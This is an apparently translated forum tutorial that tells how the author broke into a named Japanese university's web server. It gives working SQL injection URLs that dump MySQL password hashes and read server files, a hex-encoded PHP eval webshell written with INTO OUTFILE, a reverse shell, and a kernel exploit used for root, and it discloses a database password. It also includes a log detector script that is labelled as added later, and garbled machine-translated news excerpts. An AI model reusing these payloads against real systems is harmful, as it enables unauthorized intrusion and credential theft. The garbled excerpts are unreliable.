Injection, writing a shell directly, and escalating to root

Source: Internet
Author: User

Today I was idling in the group chat, and everyone was talking about girls. The group owner said one of the Japanese girls at his school came from a Japanese school: Doshisha University in Kyoto http://www.bkjia.com/ (alternative site)
He wanted to get some information from the girl's school so that he could daydream about her and succeed. So he sent me the injection point, press-ganged me, and asked me to escalate privileges. While I was at it I wrote up a tutorial and posted it, because the forum does not have many tutorials on Linux privilege escalation ~~~~
First, the injection point:

http://www.bkjia.com/chs/news/index.php?i=-1
 
On top of it you can append queries: guess the fields, check the version, check the passwords, read files ....... all kinds of queries. The statement is:
 
http://www.jp/chs/news/index.php?i=-1+union+select+1,@@datadir,3,load_file('/etc/httpd/conf/httpd.conf'),5,group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),7,8+from+mysql.user

// @@datadir is the path of the database files
// load_file reads the Apache configuration file of the web server hosting the site
// group_concat returns the MySQL users' names and password hashes, whether they may read and write files (file_priv), and which hosts they may log in from
Although the MySQL root password is mysql00, its host is localhost, so only local logins are allowed and it is of little use.

In addition, the Apache configuration file shows that the server rejects access to /admin/ and phpMyAdmin from non-university IP addresses, so even a disclosed administrator password is useless.
 
It was the load_file above that revealed the per-directory access restrictions, i.e. that logins from off-campus IP addresses are not allowed. I guessed that the Apache configuration file sat at its default absolute path, and it turned out that it did.
 
Now that we have the contents of the Apache configuration file, the physical path of the website is easy to find: /http/www/koho/
Although the /admin and phpMyAdmin directories are restricted, we can still write a shell as long as there is an injection point, because PHP's magic_quotes_gpc is off; I won't go into how to tell that it is off.
Write the one-line shell directly:
 

http://www.jp/chs/news/index.php?i=-1+union+select+0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e+into+outfile+'/http/www/koho/english/engnews_img/aa.php'#
// The trailing # comments out the rest of the original statement
/* 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E
is the HEX encoding of the one-liner <?php @eval($_POST['cmd']);?>. If you don't understand HEX encoding, Google it */
// If you select the one-liner on its own, into outfile 'path' complains that the number of columns differs, so select 1,2,3,4... alongside it so that the injected statement executes
// 0x3c3f2f2a and 0x2a2f3f3e decode to '<?/*' and '*/?>'; they are written in HEX so that the values 3,4,5,6,7 selected after the one-liner are wrapped in a comment and cannot break it
// So the final content of aa.php is "<?php @eval($_POST['cmd']);?> <?/* 3 4 5 6 7 */?>"
HEX encoding and conversion tools are available locally; search for them if you are not familiar with the encoding.
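The two injected requests above leave a distinctive trace in the web server's access log: a union select, load_file() or into outfile in the query string, and MySQL 0x... hex literals that hide PHP tags. The following detector, an added example that is not part of the original post, URL-decodes each request, decodes hex literals back to text, and reports which patterns each client triggered; the log lines are constructed samples in Apache combined format, modelled on the requests in this write-up.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the original page).
SAMPLE_LOG = """\
10.0.0.5 - - [14/Jan/2012:10:01:02 +0900] "GET /chs/news/index.php?i=3 HTTP/1.1" 200 5120
10.0.0.9 - - [14/Jan/2012:10:02:11 +0900] "GET /chs/news/index.php?i=-1+union+select+1,@@datadir,3,load_file('/etc/httpd/conf/httpd.conf'),5,6,7,8+from+mysql.user HTTP/1.1" 200 810
10.0.0.9 - - [14/Jan/2012:10:05:40 +0900] "GET /chs/news/index.php?i=-1+union+select+0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,2,3+into+outfile+'/http/www/koho/english/engnews_img/aa.php'%23 HTTP/1.1" 200 0
"""

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
RULES = [
    ("union_select", re.compile(r"union\s+select", re.I)),
    ("load_file", re.compile(r"load_file\s*\(", re.I)),
    ("into_outfile", re.compile(r"into\s+(out|dump)file", re.I)),
    ("mysql_user_table", re.compile(r"mysql\.user", re.I)),
    ("system_variable", re.compile(r"@@\w+")),
]
LOG_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)"')

def decode_hex_literals(text):
    """Replace MySQL 0x... string literals with their decoded text so that
    hex-encoded PHP tags become visible to the PHP rule below."""
    def repl(m):
        try:
            return bytes.fromhex(m.group(1)).decode("latin-1")
        except ValueError:          # odd-length run: leave the literal untouched
            return m.group(0)
    return HEX_LITERAL.sub(repl, text)

def analyse_request(request_line):
    """Return the rule names triggered by one 'METHOD /path?query HTTP/x' string."""
    path = request_line.split(" ", 2)[1] if " " in request_line else request_line
    query = path.partition("?")[2]
    decoded = decode_hex_literals(unquote_plus(query))   # '+' -> space, %23 -> '#'
    hits = [name for name, rx in RULES if rx.search(decoded)]
    if re.search(r"<\?php|<\?\s|\beval\s*\(", decoded, re.I):
        hits.append("php_code_in_query")
    return hits

def scan_log(log_text):
    """Return [(client_ip, hits), ...] for every log line that triggers a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = analyse_request(m.group(2))
        if hits:
            findings.append((m.group(1), hits))
    return findings

if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```

A positive hit on into_outfile or php_code_in_query from a non-admin client is worth an immediate check of the web root for newly written .php files, since that is exactly what the second request produces.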
Through the injection statement above, we get a one-line trojan at:
 
http://www.bkjia.com/english/engnews_img/aa.php


 

Connect to it with China Chopper (the "kitchen knife" webshell client); the password is cmd:

Upload the full trojan through it and get: http://www.doshisha.ac.jp/english/engnews_img/script.php
Use the reverse-connect function of that shell to bounce a shell back to my machine. First, listen locally:

Then, on the remote server, connect back:

Then I checked in the command line. The current privilege is:

Looking at the /tmp/ folder, I found that execute permission on /tmp/ had been removed; few servers disable it on that folder.

Fortunately, changing the permission on this folder does not require root. Run the chmod directly:
 
chmod +x /tmp/
A folder in Linux is treated like a file, so the same command works on it as on a file.

 
uname -a
// lsb_release -a also shows it

Result:

Kernel version: Linux mainz1 2.6.18-194.el5
System description: Red Hat Enterprise Linux Server release 5.5 (Tikanga)
Once the system version is known, find the matching privilege-escalation exploit !~ Then upload it to the /tmp/ folder.

Then grant it execute permission.
Usually I upload the C source and run "gcc -o /tmp/program /tmp/source.c". If gcc is unavailable, the exploit can also be compiled on another machine and uploaded as a binary, like this:

 
 
chmod +x /tmp/2.6.18-194

Then run it directly !~


 

The article ends with root obtained. Additional remarks:
We neither changed nor deleted any data on this school's server. On the 6th, the administrator shut down the website and kicked us out, which is very efficient. The notice posted after the website was closed reads as follows:

Please renew your subscription for a while

In the past few days, I have been reading this article because some Web applications have been written incorrectly.
When the Web browser is used to handle malicious operations, such as malicious attackers, malicious attackers, and malicious attackers
No such problems may occur when you are aware of these problems, or when a third-party machine is connected, such problems may occur,
Now, in this learning formula, we have been using these algorithms, instead of being taken care.
There are too many problems, and there are too many problems.
Large numbers of users cannot be confused. Why? too many requests.
Shutting down the website is still a small matter. As everyone knows, Japan has four major newspaper groups, and after the website was closed all four of them reported the incident. The news links and excerpts are as follows:
Mainichi Shimbun report: http://mainichi.jp/select/biz/news/20120114k0000e040185000c.html

  1. Comrade Social Security: I am not sure I have reached the upper limit.
  2. Gay social University (Kyoto City) zookeeper (HP) please refer to the following link for more information. HP has changed its personal experience, and the outgoing traffic has been confirmed to allow unauthorized access.
  3. The same university, the University see zookeeper website. In China, please refer to the following documents for more information: zookeeper.
  4. On the 6th day of this month, our university staff were admitted to the United Kingdom university, including regular university student enrollment, and external student enrollment. There are several cases in which personal opinions are stored, such as online marketing, online marketing, and online marketing. Same as the University's external staff, there were two major internal staff members, two senior staff members, two senior staff members, and two senior staff members. [50 TiB and large]

Asahi Shimbun report: http://www.asahi.com/digital/internet/OSK201201140064.html

The gay club's leading public opinion is not correct, such as the legal representative of the Communist Party of China, the legal representative of the Communist Party of China, and the legal representative of the Communist Party of China.
Tongzhi Social Security University (Beijing city shangjing district) zookeeper is not correct. There are two major problems in this region, and the formula is as follows) on November 11, the website was released, replacing the easy-to-use version of HP software. On the 6th day, Alibaba Cloud announced that Alibaba Cloud has been using Alibaba Cloud products. At the end of the year, he was eager to seek help from zookeeper in China, and was eager to use the presentation board to report the attack on the attack. when there are too many other users. In the HP Graduate University case, the University Center has a personal experience, which has been written directly to the relevant authorities. Please refer to the following link for more information: upper limit has been reached
I was deeply struck by this. An ordinary university in Japan was intruded into with no loss at all, yet because of Japanese media exposure and the accountability system, not only were the managers forced to strengthen security measures, the people originally responsible also lost their jobs.
Back home, in stark contrast, a hacker can sit on a website for a year without touching the homepage and the administrator will never know; the hacker only gets kicked out by the next hacker who comes along.
Even when a website's homepage is defaced, the operator pays no attention and the administrator is not held responsible, so hackers still come and go freely: stealing databases, mounting trojans, modifying pages.

Summary:
The basic idea at this injection point: the MySQL account is root, magic_quotes_gpc is off, and the webshell is written directly to the physical path of the site.
The privilege escalation: listen on a local port, bounce the remote machine's shell back, upload the EXP matching the kernel version, compile and run it, and get root.
